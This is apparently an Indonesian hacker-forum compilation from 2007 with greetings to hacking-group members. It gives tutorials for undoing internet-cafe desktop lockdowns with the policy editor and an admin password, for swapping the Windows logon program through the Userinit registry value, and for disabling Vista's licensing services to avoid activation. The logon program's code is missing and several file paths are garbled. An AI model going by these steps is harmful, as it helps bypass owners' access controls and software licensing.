jago-jago semua. Walaupun nih artikel terlalu kekanak-kanakan.. hiks...
Penutup, aku mo bilang makasih nih untuk semua yg ngedukung aku yaitu :
Buat Ibuku yang kucinta, salam sayang Ibu :) Kakak... Tunggul Joh Genesis Tampubolon, sukses buat kerjaannya. Adikku Torkis A. T, Torang B. T., Tumpal C. T., Timbul D. T., dan Trendy H. T
salam hanagat dari sini buat Medan :).
Temen2 di Medan anak2 SMU Markus, Bandku, temen2 rumah &
tetangga salam damai...
Temen di internet antara lain: Bang DoS [ZoelSepur] pendiri Indohacking, dan rekan-rekannya TH1, pendekar,
rockemon dll. Anggota 1r15... An|Vie, Djum_Put_Cok, NemesisByte dan lainnya. Temen di xcode ^family_code^, dan rekan lainnya yang nicknya rada-rada susah
diungkapkan.. sorri.. piece ajah.. Buat siapa aja deh, salam kenal ajah
dan salam damai oke...
Trik Jitu Ampuh Menghadapi Billing Explorer yang mematikan akses bila sedang berinternet
Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan...
Tutorial By: Andr3^81 ( Andr3-81 [at] Linuxmail.ORG ) Release On: 14:04 at 19 January 2007
Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer: Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba... Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...
==> Pertama Buka GPEdit.msc dulu caranya: C:WindowsSystem32GPEdit.msc <-- double Click
1. Jika Klik Kanan di Desktop tidak bisa Masuk Ke GPEdit.msc Masuk ke [User Configuration/Administrative Templates/Desktop] - Disable (Hide and disable all items on the desktop)
Jika MyComputer tidak ada - Disable (Remove My Computer icon on the Desktop)
2. Jika Ingin mengubah properties pada taskbar start menu masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar] - Disable (Prevent changes to Taskbar and Start Menu Settings)
Jika Menu Run tidak muncul - Disable (Remove Run menu from Start Menu)
Jika menu pada taskbar saat klik kanan tidak muncul - Disable (Remove access to the context menus for the taskbar) 3. Apabila Control Panel tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/Control Panel] - Disable (Prohibit access to the Control Panel)
4. Jika Command Prompt tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/System] - Disable (Prevent access to the command prompt)
Jika Registry Editor tidak bisa di akses - Disable (Prevent access to registry editing tools)
5. Jika Task Manager tidak bisa di akses Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options] - Disable (Remove Task Manager)
6. Jika Folder Options pada Windows Explorer tidak muncul Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer] - Disable (Remove these Folder Options menu item from the Tools menu)
Jika Windows Key tidak berfungsi - Disable (Turn off Windows+X hotkeys)
--------------------------------------- GPEdit.msc --------------------------------------- ------------------------------------------- end --------------------------------------------
==> Setelah GPEdit.msc terbuka baru buka Registry Tools caranya: C:WindowsSystem32
egedit.exe <-- double Click --- atau --- C:Windows
egedit.exe <-- double Click
Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu caranya: - Masuk ke Folder misalnya: C:/Windows/System32 - Trus klik salah satu file dalam folder itu misalnya: TaskMgr.exe - Kemudian klik menu File pada Win Explorer - Run as... - Klik The following user -> Masukkan passwordnya Username: Administrator Password: ******** - Selesai NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara lain silakan anda temukan sendiri, selamat mencoba
Contoh lain2nya dibawah ini...........
1. Membuka MSConfig dari Windows Explorer Caranya: C:WINDOWSpchealthhelpctrinariesMSConfig.exe
2. Membuka Sysedit dari Windows Explorer Caranya: C:WindowsSystem32Sysedit.exe
3. Membuka Task Manager Caranya: C:WindowsSystem32 askmgr.exe
4. Membuka Services.msc Caranya: C:WindowsSystem32services.msc
5. Membuka Disk Management System (Melihat Partisi Harddisk) Caranya: C:WindowsSystem32diskmgmt.msc
6. Membuka Computer Management Services Caranya: C:WindowsSystem32compmgmt.msc
7. Membuka Shortcut to desktop Caranya: C:WindowsSystem32Show Desktop
8. Membuka Defragment Caranya C:WindowsSystem32dfrg.msc
Yang pasti perlu diketahui, tutorial ini hanya untuk para pemula yang
menggunakan Win***s, jadi untuk orang-orang yang merasa ilmunya sudah cukup
tinggi, silakan saja lanjut ke artikel lainnya, atau kalau berkenan, silakan
beri komentar dan masukan.
Cerita bermula dari seorang teman yang agak resah karena password logon
komputernya telah direset oleh seseorang, dan bebrapa data telah diambil dan
dihapus. Usut punya usut, ternyata yang melakukannya adalah teman sekamarnya di
kosan yang melakukannya, dengan menggunakan software pereset password yang ada
di dalam software HirenBootCD’s. Hal ini dikarenakan menurutnya sang pemilik
komputer terlalu pelit dengan komputernya, sehingga dia tidak leluasa untuk
meminjam dan memakai komputernya.
Pemilik komputer tersebut kemudian menanyakan ke saya bagaimana cara untuk dapat
mencegah kemungkinan diresetnya password administrator dengan CD Hiren tersebut.
Salah satu saran saya adalah ganti OS ke Linux atau yg lainnya, tapi itu tidak
mungkin kata dia. Kemudian saya berpikir dan bertanya ke dia, software programin
apa yang dia punya, kata dia ada Visual Basic 6.0 disana. Okay, sekarang kita
pakai tuh software untuk membuat program kecil pengganti logon windows.
Pertama yang perlu disiapkan adalah software Visual Basic dan segelas kopi panas...
hehehehehe....
Kemudian buat sebuah Form yang kira2 bentuknya seperti ini :
Kemudian ketikkan kode programnya sebagai berikut :
Lalu buat sebuah Form lagi seperti ini :
Dan kode programnya seperti ini :
Setelah selesai, pastikan program berjalan dengan baik. Untuk memastikannya
jalankan Run kemudian isi username dengan ”siapa” (tanpa tanda petik) dan
password dengan ”aja” (tanpa tanda petik) dan akan muncul windows explorer
dengan folder pertama adalah My Documents.
Ok selanjutnya yang diperlukan adalah mengcompile file tersebut dan membuatnya
menjadi file exe, serta menyimpannya di dalam sebuah folder, misalnya
C:\Windows\Sistem\logon.exe
Setelah selesai pembuatan software, sekarang kita masuk ke jendela registry.
Cari alamat berikut :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
kemudian ubah nilai dari Userinit menjadi C:\Windows\sistem\logon.exe
Untuk sementara ubah registry yang men-disable-kan taskmanager, karena ini perlu
untuk pengecekan jika ada kesalahan.
Setelah semua selesai, restart komputer......
Dan sebagai ganti dari logon windows yang biasanya, yang tertampil adalah
tampilan form buatan kita. Jangan lupa masukkan password yang telah kita hapal
itu.
Nah jika tidak berhasil, tekan Alt+Ctrl+Delete untuk menampilkan taskmanager dan
pilih menu file > New Task (Run) ketik explorer.exe lalu Enter. Dan ulangi
pembuatan program seperti yang ada di atas.
Dan jika sudah berhasil, silakan untuk mengubah registry yang mematikan
taskmanager.
Jika temanmu itu masih menggunakan Software pereset password windows silakan
saja, lha wong kita gak make password itu buat logon ke windowsnya... hehehehehe....
Setelah berhari-hari ternyata pemilik komputer itu datang lagi dengan muka sedih...
Ternyata temannya malah menghapus program logon.exe-nya dengan menggunakan
software NTFS 4 DOS yang juga ada di CD Hiren. Nah lho......
Pesenku, makanya jangan pelit sama temen.....
Hehehehe....
Microsoft Akhirnya mengeluarkan windows andalanya yaitu Windows Vista
yang sebentar lagi akan resmi di luncurkan di indonesia.
Menurut Microsoft Bahwa Windows Vista andalanya susah di
jebol atau di Crack.padahal hal itu tidak bisa di benarkan 100%.
Saya akan memberitahukan caranya Mengrack Windows Vista
Final Release.Tahapannya sebagai berikut:
1. klik bendera windows|Klik Run|dan ketik Cmd.
2. setelah Muncul command prompt ketikan slmgr.vbs -dlv
lalu tekan enter.fungsi dari perintah slmgr.vbs -dlv adalah untuk memeriksa
Apakah Komponen Dari Windows untuk mengaktifkan Vistanya Berjalan.
3. klik bendera windows|klik Run|dan ketik
Services.msc,Cari software Licensing,dan pilih Disable di startup type.setelah
itu Cari Ui Notification dan pilih Disable di startup type.setelah selesai klik
close.
4. klik bendera windows|Klik Run|dan ketik Cmd|ketikan
slmgr.vbs -dlv lalu tekan enter. Setelah software licensing di disable dan juga
UI notification, maka Komponen Windows Untuk Menjalankan Slsvc.exe Akan tidak
jalan.
Catatanp:
setelah Melakukan tahapan di atas yang perlu anda
perhatikan adalah:
1.Anda tidak bisa Menjalankan Control Panel 2.Anda tidak
bisa Menjalankan Properties kalau di klik kanan di desktop.
3.Anda tidak bisa Menjalankan Properties kalau di klik
kanan di My Computer.
Tetapi jangan khawatir karena anda masih bisa
menginstall Program baru. dan semua aplikasi windows seperti Windows Media
player,dan lain-lain. masih bisa di jalankan.
Bagi Anda Yang Ingin Menggunakan Antivirus Buatan Anak Bangsa Silahkan Download dan menggunakannya mudah2 bisa bermanfaat dan berguna untuk membasmi virus local maupun virus buatan luar negeri :